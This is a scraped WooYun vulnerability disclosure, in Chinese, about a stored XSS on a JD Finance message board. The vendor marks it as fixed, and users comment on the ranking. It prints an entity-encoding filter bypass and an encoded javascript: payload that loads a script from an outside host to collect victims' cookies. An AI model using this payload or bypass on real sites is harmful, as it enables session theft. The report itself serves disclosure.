京东金融某处存储XSS跨站可提取Cookies | wooyun-2016-0167176| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167176

漏洞标题：京东金融某处存储XSS跨站可提取Cookies

漏洞作者： Power

提交时间：2016-01-04 14:26

修复时间：2016-01-06 09:47

公开时间：2016-01-06 09:47

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-04：细节已通知厂商并且等待厂商处理中
2016-01-05：厂商已经确认，细节仅向厂商公开
2016-01-06：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

没描述清楚？非自X

详细说明：

测试了下留言板处，发现存储XSS,因未过滤"<",">"及p,a,img标签,及javascript:伪协议，综合到一起形成存储型XSS 但是明文插入式不可以的，需要修改编码,服务器端规则过滤了"&#***;"这种形式的，实体编码，但是当使用"&#***"最后没有分号也可以，例如"&#0000106"浏览器也能够进行html解码，并且京东将大部分事件都过滤了,所以只能使用javascript:下面是详细过程插入点: http://club.jr.jd.com/topic/618751&orderBy=*&pageNo=* 留言板处插入如下代码插入的源代码是这样

<a href=javascript:document.write('<script src=***></script>')>

源代码经过编码之后是这样,这里自己写了个半自动化脚本进行编码，编码后插入语句是这样的

</p> 111 <a href=javascript:&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000100&#0000111&#0000099&#0000117&#0000109&#0000101&#0000110&#0000116&#0000046&#0000119&#0000114&#0000105&#0000116&#0000101&#0000040&#0000039&#0000060&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000032&#0000115&#0000114&#0000099&#0000061&#0000104&#0000116&#0000116&#0000112&#0000058&#0000047&#0000047&#0000116&#0000046&#0000099&#0000110&#0000047&#0000082&#0000052&#0000073&#0000067&#0000097&#0000090&#0000066&#0000062&#0000060&#0000047&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000062&#0000039&#0000041> <p>

代码插入的地址如下
http://club.jr.jd.com/topic/619467&orderBy=1&pageNo=3
插入效果如下

但是这段代码貌似只能在IE6中触发(IE6测试成功) 平台收cookie

漏洞证明：

http://club.jr.jd.com/topic/619467&orderBy=1&pageNo=3

修复方案：

版权声明：转载请注明来源 Power@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-01-05 11:14

厂商回复：

此问题已内部发现，已在修复中。感谢关注京东金融安全

漏洞评价：

评价

2016-01-06 10:19 | Power ( 实习白帽子 | Rank:56 漏洞数:24 | 丫的，别看我还没转正，就欺负我！)

你确认修复了？真逗,你们都没明白啥原理
2016-01-11 09:53 | max_kun ( 路人 | Rank:0 漏洞数:1 | 求个xss平台有的私密我啊)

rank 难道不是凭技术 + 危害分的的吗？一个弱密码都能3rank这个才1rank 什么意思？
2016-01-13 08:33 | tangtanglove ( 路人 | Rank:7 漏洞数:3 | 一个对安全感兴趣的屌丝php程序员)

@max_kun 我提交的也只给了2rank
2016-01-26 16:03 | 晨曦遇晓 ( 普通白帽子 | Rank:184 漏洞数:40 | 从明天起，不装逼。)

高端分析，低端rank，感觉不会在爱了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167176

漏洞标题：京东金融某处存储XSS跨站可提取Cookies

相关厂商：京东金融

漏洞作者： Power

提交时间：2016-01-04 14:26

修复时间：2016-01-06 09:47

公开时间：2016-01-06 09:47

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Power@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167176

漏洞标题：京东金融某处存储XSS跨站可提取Cookies

相关厂商：京东金融

漏洞作者： Power

提交时间：2016-01-04 14:26

修复时间：2016-01-06 09:47

公开时间：2016-01-06 09:47

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0167176"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Power@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：